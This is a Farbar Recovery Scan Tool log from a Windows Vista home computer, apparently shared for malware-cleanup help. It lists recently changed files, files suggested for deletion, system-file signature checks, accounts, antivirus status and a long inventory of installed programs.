2016-11-04 08:57 - 2006-11-02 05:47 - 00003696 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2016-11-03 16:56 - 2006-11-02 03:22 - 07077888 _____ C:\Windows\system32\config\default_previous
2016-11-03 16:56 - 2006-11-02 03:22 - 00262144 _____ C:\Windows\system32\config\security_previous
2016-11-03 16:31 - 2007-12-16 14:12 - 00000000 ____D C:\Windows\pss
2016-11-03 15:02 - 2007-12-17 16:46 - 00000000 ____D C:\Program Files\Canon
2016-11-03 15:02 - 2007-11-27 01:48 - 00000000 ___HD C:\Program Files\InstallShield Installation Information
2016-11-03 14:56 - 2008-03-16 11:12 - 00000000 ____D C:\Users\Pat\AppData\Local\Yahoo
2016-11-03 14:56 - 2007-11-27 02:11 - 00000000 ____D C:\ProgramData\YAHOO
2016-11-03 14:56 - 2007-11-27 02:09 - 00000000 ____D C:\Program Files\Yahoo!
2016-11-03 14:52 - 2008-08-28 11:36 - 00000000 ____D C:\Users\Pat\AppData\Roaming\Yahoo!
2016-11-03 14:52 - 2008-08-28 11:36 - 00000000 ____D C:\ProgramData\Yahoo!
2016-11-03 14:52 - 2006-11-02 05:37 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2016-11-03 14:51 - 2010-08-23 09:33 - 00000000 ____D C:\Program Files\Windows Live
2016-11-03 12:02 - 2007-12-14 11:14 - 00000000 ____D C:\Program Files\Citrix
2016-11-03 11:57 - 2007-11-27 02:13 - 00000000 ____D C:\Program Files\Dell
2016-11-03 11:53 - 2007-12-13 14:31 - 00000000 ____D C:\Users\Pat\AppData\Local\Google
2016-11-03 11:25 - 2007-12-21 17:24 - 00000000 ____D C:\ProgramData\Lavasoft
2016-11-03 11:25 - 2007-12-21 17:24 - 00000000 ____D C:\Program Files\Lavasoft
2016-11-03 05:53 - 2011-01-31 11:26 - 00000680 _____ C:\Users\Pat\AppData\Local\d3d9caps.dat
2016-11-03 05:00 - 2016-09-22 05:22 - 00000000 ____D C:\Users\Pat\AppData\Local\d102cc
2016-11-02 06:16 - 2006-11-02 05:37 - 00000000 ____D C:\Windows\DigitalLocker
2016-11-01 18:39 - 2014-04-28 09:00 - 00011183 _____ C:\Users\Pat\Desktop\JRT.txt
2016-11-01 16:52 - 2014-04-28 08:39 - 00000000 ____D C:\AdwCleaner
2016-11-01 15:31 - 2006-11-02 03:33 - 00759582 _____ C:\Windows\system32\PerfStringBackup.INI
2016-11-01 11:35 - 2007-12-13 18:58 - 00000000 ____D C:\Windows\Minidump
2016-11-01 11:35 - 2006-11-10 06:22 - 00000000 ____D C:\Windows\Panther
2016-11-01 11:35 - 2006-11-02 04:18 - 00000000 ____D C:\Windows\ModemLogs
2016-10-27 18:22 - 2009-10-02 23:31 - 00407720 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2016-10-27 11:03 - 2007-11-27 01:45 - 00000012 _____ C:\Windows\bthservsdp.dat
2016-10-26 16:01 - 2013-03-11 16:11 - 00796352 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2016-10-26 16:01 - 2013-03-11 16:11 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2016-10-26 16:01 - 2007-11-27 01:44 - 00000000 ____D C:\Windows\system32\Macromed
2016-10-26 00:40 - 2014-10-03 14:40 - 00000399 _____ C:\Users\Pat\AppData\Roaming\WB.CFG
2016-10-20 15:44 - 2016-02-01 17:55 - 00034817 _____ C:\Users\Pat\Documents\Documents\Documents\Actual vs. Budget Jan 2016.xlsx
2016-10-20 15:44 - 2014-10-28 15:18 - 00020975 _____ C:\Users\Pat\Documents\Documents\Documents\MSSL Check Book.xlsx
 
==================== Files in the root of some directories =======
 
2011-07-04 14:12 - 2011-07-04 14:14 - 0428664 _____ (OpenOffice                                                  ) C:\Program Files\OpenOffice Downloader.exe
2011-07-04 14:12 - 2011-07-04 14:18 - 158067944 _____ () C:\Program Files\OpenOffice.exe
2009-08-20 16:20 - 2009-12-05 06:09 - 8653312 _____ (Dell, Inc.                                                   ) C:\Users\Pat\AppData\Roaming\DataSafeDotNet.exe
2009-11-11 00:30 - 2009-11-11 00:30 - 8346560 _____ (Dell, Inc.                                                   ) C:\Users\Pat\AppData\Roaming\DataSafeDotNet_AVG_RESTORED.exe
2008-04-24 09:49 - 2008-08-22 17:38 - 0000235 _____ () C:\Users\Pat\AppData\Roaming\devices.xml
2016-09-06 13:48 - 2016-09-06 13:48 - 0000370 _____ () C:\Users\Pat\AppData\Roaming\mplex-log.log
2016-09-06 13:28 - 2016-09-06 13:54 - 0000860 _____ () C:\Users\Pat\AppData\Roaming\PPTConverter.log
2008-04-24 09:49 - 2008-08-22 17:38 - 0000012 _____ () C:\Users\Pat\AppData\Roaming\settings.xml
2010-10-13 10:38 - 2009-03-02 17:48 - 0076407 _____ () C:\Users\Pat\AppData\Roaming\Smiley.ico
2014-10-03 14:40 - 2016-10-26 00:40 - 0000399 _____ () C:\Users\Pat\AppData\Roaming\WB.CFG
2011-01-31 11:26 - 2016-11-03 05:53 - 0000680 _____ () C:\Users\Pat\AppData\Local\d3d9caps.dat
2007-12-13 14:41 - 2016-06-23 17:40 - 0155648 _____ () C:\Users\Pat\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-10-10 00:40 - 2014-12-17 01:40 - 0000010 _____ () C:\Users\Pat\AppData\Local\DSI.DAT
2013-02-22 13:57 - 2013-02-22 13:57 - 0000057 _____ () C:\ProgramData\Ament.ini
2008-04-24 09:15 - 2009-07-04 05:24 - 0001907 _____ () C:\ProgramData\hpzinstall.log
2016-08-12 09:37 - 2016-08-12 09:37 - 0005116 _____ () C:\ProgramData\rxsmznjf.zcp
 
Files to move or delete:
====================
C:\Users\Pat\hpothb07.dat
C:\Users\Public\FastBrowserURLDownload.exe
 
 
Some files in TEMP:
====================
C:\Users\Pat\AppData\Local\Temp\libeay32.dll
C:\Users\Pat\AppData\Local\Temp\msvcr120.dll
C:\Users\Pat\AppData\Local\Temp\sqlite3.dll
 
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-11-04 09:31
 
==================== End of FRST.txt ============================
 
 
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 03-11-2016
Ran by Pat (04-11-2016 10:08:08)
Running from C:\Users\Pat\Documents\Documents\Documents\Downloads
Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) (2007-11-27 08:36:28)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-598873941-3244639055-2830076859-500 - Administrator - Disabled)
Guest (S-1-5-21-598873941-3244639055-2830076859-501 - Limited - Disabled)
Pat (S-1-5-21-598873941-3244639055-2830076859-1000 - Administrator - Enabled) => C:\Users\Pat
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Microsoft Security Essentials (Enabled - Up to date) {71A27EC9-3DA6-45FC-60A7-004F623C6189}
AS: Microsoft Security Essentials (Enabled - Up to date) {CAC39F2D-1B9C-4A72-5A17-3B3D19BB2B34}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
1.0 (HKLM\...\The Tetris Game_is1) (Version:  - www.thetetrisgame.com)
Adobe Flash Player 23 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 23.0.0.205 - Adobe Systems Incorporated)
Adobe Flash Player 23 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 23.0.0.205 - Adobe Systems Incorporated)
Adobe Reader X (10.1.16) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.16 - Adobe Systems Incorporated)
Adobe Shockwave Player (HKLM\...\Adobe Shockwave Player) (Version: 11 - Adobe Systems, Inc.)
Amazon Music (HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\Amazon Amazon Music) (Version: 4.3.2.1367 - Amazon Services LLC)
AnyTrans 4.7.5 (HKLM\...\{E580ED1F-AAF8-4F7E-B174-54BFA2B94E0B}}_is1) (Version: 4.7.5 - iMobie Inc.)
Apple Application Support (HKLM\...\{A83279FD-CA4B-4206-9535-90974DE76654}) (Version: 2.1.5 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{35B91753-5789-4517-9CF1-2CCE3A8CF4F1}) (Version: 2.0.0.33 - Apple Inc.)
Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ATI Catalyst Control Center (HKLM\...\{055EE59D-217B-43A7-ABFF-507B966405D8}) (Version: 1.007.2007.0318 - )
Backgammon Classic 7.1 (HKLM\...\Backgammon Classic_is1) (Version:  - Microsys Com Ltd.)
BlackBerry Desktop Software 4.3 (HKLM\...\BlackBerry_{0D048BE8-AE02-4CB5-A428-616B9848E4A7}) (Version: 4.3.0.17 - Research In Motion Ltd.)
BlackBerry Desktop Software 4.3 (Version: 4.3.0.17 - Research In Motion Ltd.) Hidden
Bridge From Special K (C:\Program Files\Bridge From Special K\) (HKLM\...\ST6UNST #2) (Version:  - )
Bridge From Special K (HKLM\...\ST6UNST #1) (Version:  - )
BufferChm (Version: 100.0.170.000 - Hewlett-Packard) Hidden
Callarama System (HKLM\...\ST6UNST #3) (Version:  - )
Camera Access Library (Version: 8.0.0.21 - Canon) Hidden
Camera Support Core Library (Version: 7.3.0.4 - Canon) Hidden
Camera Window DS (Version: 5.3.1 - Canon) Hidden
Camera Window DVC (Version: 5.4.4 - Canon) Hidden
Camera Window DVC (Version: 6.0 - Canon) Hidden
Camera Window MC (Version: 6.0 - Canon) Hidden
Canon Camera Access Library (HKLM\...\InstallShield_{901F8ED7-13E8-43EF-B738-2FE89B0588EB}) (Version: 8.0.0.21 - Canon)
Canon Camera Support Core Library (HKLM\...\InstallShield_{A1D0D14A-B776-4907-BC00-5149F2298086}) (Version: 7.3.0.4 - Canon)
Canon Camera Window DC_DV 5 for ZoomBrowser EX (HKLM\...\InstallShield_{A2EB8F2E-6D9B-4F8B-96EB-F976D33F416F}) (Version: 5.4.4 - Canon)
Canon Camera Window DC_DV 6 for ZoomBrowser EX (HKLM\...\InstallShield_{50E25180-3BDC-4B6D-80A2-3F1F0C9CF39D}) (Version: 6.0 - Canon)
Canon Camera Window DSLR 5 for ZoomBrowser EX (HKLM\...\InstallShield_{0A146245-DB79-4197-BF5D-FE1A699A2CC7}) (Version: 5.3.1 - Canon)
Canon Camera Window MC 6 for ZoomBrowser EX (HKLM\...\InstallShield_{6C3A75A6-9A90-44A3-A703-82AC1EA6A85D}) (Version: 6.0 - Canon)
Canon MovieEdit Task for ZoomBrowser EX (HKLM\...\InstallShield_{4DBBF091-FACD-422C-B43C-786335BD5398}) (Version: 2.1.0.20 - Canon)
Canon PhotoRecord (HKLM\...\{BBBC2B89-E193-4348-A83C-C8DD8210A4AC}) (Version: 02.02.03002 - Cisra)
Canon RAW Image Task for ZoomBrowser EX (HKLM\...\InstallShield_{BAA43DA2-B6C5-46EC-B163-0E8EEAF975A4}) (Version: 2.2 - Canon)
Canon Utilities PhotoStitch 3.1 (HKLM\...\InstallShield_{874E44F3-B9A7-4AA1-B4BA-83E5684ED9C6}) (Version: 3.1.16 - Canon)
Canon ZoomBrowser EX (E) (HKLM\...\{C1D76D7A-F3BB-47EA-A746-5B1E2FFC1DF2}) (Version: 5.05.0000 - Canon)
Carbonite (HKLM\...\{E711D777-58CF-4F58-86D8-AD86FF36686C}) (Version: 5.8.9 build 6256 (May-19-2016) - Carbonite)
ccc-core-static (Version: 0108.2146.2565.38893 - ATI) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 5.23 - Piriform)
Chinese Simplified Fonts Support For Adobe Reader X (HKLM\...\{AC76BA86-7AD7-2447-0000-A00000000003}) (Version: 10.0.0 - Adobe Systems Incorporated)
Citrix Online Launcher (HKLM\...\{F17C3DC2-2ACA-4B0E-BDBF-ACE61B14E7CD}) (Version: 1.0.183 - Citrix)
Click 2 Crop 4.8 (HKLM\...\Click 2 Crop_is1) (Version:  - Boris A. Glazer)
Conexant D850 PCI V.92 Modem (HKLM\...\CNXT_MODEM_PCI_VEN_14F1&DEV_2F20&SUBSYS_200F14F1) (Version:  - )
D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden
datasafeupdate (HKLM\...\{1D0BD79C-F8DA-4803-9C23-55480D769704}) (Version: 1.00.0000 - Dell, Inc.)
Dell DataSafe Online (HKLM\...\{13766F76-6C8C-4E57-A9F3-3212D1C6E0D1}) (Version: 1.2.0009 - Dell, Inc.)
Dell Getting Started Guide (HKLM\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.)
Dell Support Center (Support Software) (HKLM\...\{E3BFEE55-39E2-4BE0-B966-89FE583822C1}) (Version: 2.2.09085 - Dell)
DellSupport (HKLM\...\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}) (Version: 6.0.3075 - Dell)
DeLorme Street Atlas USA 2008 Plus (HKLM\...\{3F7D7F4A-6F41-4FCE-80B3-DB4210FA01EA}) (Version: 1.0.2008 - DeLorme Publishing, Inc.)
Destination Component (Version: 100.0.0.0 - Hewlett-Packard) Hidden
DeviceDiscovery (Version: 100.0.190.000 - Hewlett-Packard) Hidden
DeviceManagementQFolder (Version: 1.00.0000 - Hewlett-Packard) Hidden
Digital Line Detect (HKLM\...\{E646DCF0-5A68-11D5-B229-002078017FBF}) (Version: 1.21 - BVRP Software, Inc)
Dirt Track Racing 2 (HKLM\...\Dirt Track Racing 2) (Version:  - )
DocMgr (Version: 100.0.201.000 - Hewlett-Packard) Hidden
DocProc (Version: 12.0.0.0 - Hewlett-Packard) Hidden
DocProcQFolder (Version: 1.00.0000 - Hewlett-Packard) Hidden
EarthLink Setup Files (HKLM\...\{5E68BB65-4059-4FE5-AAC4-0CD1D79BBDE2}) (Version: 2005.2.178.0.2.2 - EarthLink, Inc.)
Elevated Installer (Version: 2.4.6.0 - Garmin Ltd or its subsidiaries) Hidden
eSupportQFolder (Version: 1.00.0000 - Hewlett-Packard) Hidden
Farkle 3.0.13.10 (HKLM\...\Farkle_is1) (Version:  - )
Garmin Express (HKLM\...\{29382fb9-c7e9-45a6-a223-db732d64f6a6}) (Version: 2.4.6.0 - Garmin Ltd or its subsidiaries)
Garmin Express (Version: 2.4.6.0 - Garmin Ltd or its subsidiaries) Hidden
Garmin Express Tray (Version: 2.4.6.0 - Garmin Ltd or its subsidiaries) Hidden
Google Chrome (HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\Google Chrome) (Version: 49.0.2623.112 - Google Inc.)
Google Desktop (HKLM\...\Google Desktop) (Version: - - Google)
Google Earth (HKLM\...\{817750FA-EC6A-485D-9901-0683AE6FFDF1}) (Version: 7.1.5.1557 - Google)
Google Toolbar for Internet Explorer (HKLM\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.7619.1252 - Google Inc.)
Google Toolbar for Internet Explorer (Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.22.3 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.31.5 - Google Inc.) Hidden
Google Updater (HKLM\...\Google Updater) (Version: 2.4.2432.1652 - Google Inc.)
GPBaseService (Version: 100.0.187.000 - Hewlett-Packard) Hidden
Hoyle Card Games 2005 (HKLM\...\{B44AA698-B221-4B3B-8CA5-E65EF6A5AF26}) (Version: 1.2.0.0 - Encore, Inc.)
HP Document Manager 1.0 (HKLM\...\HP Document Manager) (Version: 1.0 - HP)
HP Imaging Device Functions 10.0 (HKLM\...\HP Imaging Device Functions) (Version: 10.0 - HP)
HP Memories Disc (HKLM\...\{B376402D-58EA-45EA-BD50-DD924EB67A70}) (Version: 1.0.4.805 - Hewlett-Packard Company)
HP Photo Creations (HKLM\...\HP Photo Creations) (Version: 1.0.0.7702 - HP)
HP Photosmart 6520 series Basic Device Software (HKLM\...\{8B0F2985-0468-4770-8CB7-6592A7639BAE}) (Version: 28.0.989.0 - Hewlett-Packard Co.)
HP Photosmart 6520 series Help (HKLM\...\{D3293275-1002-41F5-BC37-099B4251FF5B}) (Version: 28.0.0 - Hewlett Packard)
HP Photosmart 6520 series Product Improvement Study (HKLM\...\{AE6A0886-51FE-4B52-95BB-33281A80CD6D}) (Version: 28.0.989.0 - Hewlett-Packard Co.)
HP Photosmart Essential 2.5 (HKLM\...\HP Photosmart Essential) (Version: 2.5 - HP)
HP Smart Web Printing (HKLM\...\HP Smart Web Printing) (Version: 3.5 - HP)
HP Solution Center 10.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 10.0 - HP)
HP Update (HKLM\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HPProductAssistant (Version: 100.0.170.000 - Hewlett-Packard) Hidden
HPSSupply (Version: 100.0.170.000 - Hewlett-Packard) Hidden
Intel® PRO Network Connections 12.1.11.0 (HKLM\...\PROSetDX) (Version:  - Intel)
Internet Explorer (Enable DEP) (HKLM\...\{a9264802-8a7a-40fe-a135-5c6d204aed7a}.sdb) (Version:  - )
Internet Service Offers Launcher (HKLM\...\{CCFF1E13-77A2-4032-8B12-7566982A27DF}) (Version: 1.00.0000 - Dell Inc.)
inTuneMP3 (HKLM\...\{508BFA95-545E-42A2-8C9D-E531C53C9B79}) (Version: 1.5.0 - W3i Holdings)
IrfanView (remove only) (HKLM\...\IrfanView) (Version:  - )
iTunes (HKLM\...\{EF6C4600-306D-4F6A-A119-C2A877D25B4A}) (Version: 7.7.0.43 - Apple Inc.)
Junk Mail filter update (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Leawo PowerPoint to Video Pro version 2.8.0.0 (HKLM\...\{5D5CB188-F9B1-4103-B2AD-07FB33068377}_is1) (Version: 2.8.0.0 - Leawo Software)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Mesh Runtime (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Messenger Companion (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Fix it Center (HKLM\...\{B7588D45-AFDC-4C93-9E2E-A100F3554B64}) (Version: 1.0.0100 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.10.205.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50709.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ Run Time  Lib Setup (HKLM\...\{AAF4238F-7C29-451D-9925-C753271A5728}) (Version: 1.0.0 - Microsoft)
Modem Diagnostic Tool (HKLM\...\{F63A3748-B93D-4360-9AD4-B064481A5C7B}) (Version: 1.0.17.8 - Dell)
Move Networks Media Player for Internet Explorer (HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\Move Networks Player - IE) (Version:  - )
MovieEdit Task (Version: 2.1.0.20 - Canon) Hidden
MSXML 4.0 SP2 (KB936181) (HKLM\...\{C04E32E0-0416-434D-AFB9-6969D703A9EF}) (Version: 4.20.9848.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB941833) (HKLM\...\{C523D256-313D-4866-B36A-F3DE528246EF}) (Version: 4.20.9849.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Music, Photos & Videos Launcher (HKLM\...\{D7769185-9A7C-48D4-8874-5388743A1DE2}) (Version: 1.00.0000 - Dell Inc.)
NetWaiting (HKLM\...\{3F92ABBB-6BBF-11D5-B229-002078017FBF}) (Version: 2.5.44 - BVRP Software, Inc)
OCR Software by I.R.I.S. 10.0 (HKLM\...\HPOCR) (Version: 10.0 - HP)
OGA Notifier 2.0.0048.0 (Version: 2.0.0048.0 - Microsoft Corporation) Hidden
Open Freely (HKLM\...\{1BF14E04-85DE-480C-9A04-EB36744C66C3}_is1) (Version: 1.0 - Download Freely, LLC)
Open Kart (HKLM\...\Open Kart_is1) (Version: 1.0 - GameTop Pte. Ltd.)
OpenOffice (HKLM\...\OpenOffice_is1) (Version: 1.0 - OpenOffice)
OpenOffice.org 3.3 (HKLM\...\{3E171899-0175-47CC-84C4-562ACDD4C021}) (Version: 3.3.9567 - OpenOffice.org)
PhotoRescue Wizard PC 3.2.8.13112 (HKLM\...\PhotoRescue Wizard PC_is1) (Version:  - DataRescue sa/nv)
PhotoStitch (Version: 3.1.16 - Canon) Hidden
Picasa 3 (HKLM\...\Picasa 3) (Version: 3.9 - Google, Inc.)
Product Documentation Launcher (HKLM\...\{89CEAE14-DD0F-448E-9554-15781EC9DB24}) (Version: 1.00.0000 - Dell Inc.)
PSSWCORE (Version: 2.02.0000 - Hewlett-Packard) Hidden
QuickTime (HKLM\...\{7BE15435-2D3E-4B58-867F-9C75BED0208C}) (Version: 7.71.80.42 - Apple Inc.)
Race Cars The Extreme Rally (HKLM\...\Race Cars The Extreme Rally_is1) (Version:  - )
RAW Image Task 2.2 (Version: 2.2 - Canon) Hidden
RealDownloader (Version: 1.3.3 - RealNetworks, Inc.) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer (HKLM\...\RealPlayer 16.0) (Version: 16.0.3 - RealNetworks)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version:  - )
RealUpgrade 1.1 (Version: 1.1.0 - RealNetworks, Inc.) Hidden
Roxio Creator Audio (HKLM\...\{83FFCFC7-88C6-41c6-8752-958A45325C82}) (Version: 3.3.0 - Roxio)
Roxio Creator BDAV Plugin (HKLM\...\{880AF49C-34F7-4285-A8AD-8F7A3D1C33DC}) (Version: 3.3.0 - Roxio)
Roxio Creator Copy (HKLM\...\{619CDD8A-14B6-43a1-AB6C-0F4EE48CE048}) (Version: 3.3.0 - Roxio)
Roxio Creator Data (HKLM\...\{0D397393-9B50-4c52-84D5-77E344289F87}) (Version: 3.3.0 - Roxio)
Roxio Creator DE (HKLM\...\{C8B0680B-CDAE-4809-9F91-387B6DE00F7C}) (Version: 3.3.0 - Roxio)
Roxio Creator Tools (HKLM\...\{0394CDC8-FABD-4ed8-B104-03393876DFDF}) (Version: 3.3.0 - Roxio)
Roxio Express Labeler (HKLM\...\{6675CA7F-E51B-4F6A-99D4-F8F0124C6EAA}) (Version: 2.1.0 - Roxio)
Roxio Update Manager (HKLM\...\{30465B6C-B53F-49A1-9EBA-A3F187AD502E}) (Version: 3.0.0 - Roxio)
Segoe UI (Version: 15.4.2271.0615 - Microsoft Corp) Hidden
Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 10.0 - HP)
Skins (Version: 0108.2146.2565.38893 - ATI) Hidden
SmartWebPrintingOC (Version: 100.0.189.000 - Hewlett-Packard) Hidden
SolutionCenter (Version: 100.0.175.000 - Hewlett-Packard) Hidden
Sonic Activation Module (Version: 1.0 - Sonic Solutions) Hidden
Spybot - Search & Destroy (HKLM\...\{B4092C6D-E886-4CB2-BA68-FE5A88D31DE6}_is1) (Version: 1.6.2 - Safer Networking Limited)
Spybot - Search & Destroy 1.5.2.20 (HKLM\...\Spybot - Search & Destroy_is1) (Version:  - Safer Networking Ltd.)
Status (Version: 100.0.272.000 - Hewlett-Packard) Hidden
Street Atlas USA 2006 (Version: 1.00.000 - DeLorme) Hidden
Tiger Woods PGA TOUR 2000 (HKLM\...\Tiger Woods PGA TOUR 2000) (Version:  - )
TrayApp (Version: 100.0.170.000 - Hewlett-Packard) Hidden
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
User's Guides (HKLM\...\{5CD29180-A95E-11D3-A4EB-00C04F7BDB2C}) (Version:  - )
VideoToolkit01 (Version: 100.0.128.000 - Hewlett-Packard) Hidden
VZAccess Manager for RIM (HKLM\...\{02807340-8FA2-44B6-ABA1-E443E4FF0A20}) (Version: 6.9.0 - Smith Micro Software Inc.)
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 15.4.3502.0922 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows Mobile Device Center (HKLM\...\{904CCF62-818D-4675-BC76-D37EB399F917}) (Version: 6.1.6965.0 - Microsoft Corporation)
Windows Mobile Device Center Driver Update (HKLM\...\{E7044E25-3038-4A76-9064-344AC038043E}) (Version: 6.1.6965.0 - Microsoft Corporation)
Xilisoft Audio Converter 6 (HKLM\...\Xilisoft Audio Converter 6) (Version: 6.5.0.20130130 - Xilisoft)
Xilisoft PowerPoint to Video Converter Free (HKLM\...\Xilisoft PowerPoint to Video Converter Free) (Version: 1.1.1.20120601 - Xilisoft)
Yahoo! Browser Services (HKLM\...\Yahoo! Extras) (Version:  - )
Yahoo! Install Manager (HKLM\...\YInstHelper) (Version:  - )
Yahoo! Music Jukebox (HKLM\...\{EC3B8CA2-49B8-4D38-BE9C-ABD0F6029168}) (Version: 2.1.1.013 - Yahoo!)
zoom.us (HKLM\...\{237FB6DF-B351-4567-9226-4CE4A9CBBEA8}) (Version: 0.9 - Zoom Video Communications, Inc.)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{022105BD-948A-40C9-AB42-A3300DDF097F}\localserver32 -> C:\Users\Pat\AppData\Local\Google\Update\GoogleUpdate.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{035FBE31-3755-450A-A775-5E6BBD43D344}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.135\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{095A2EEC-F7FE-42E8-96FB-C20E53081908}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.99\psuser.dll => No File
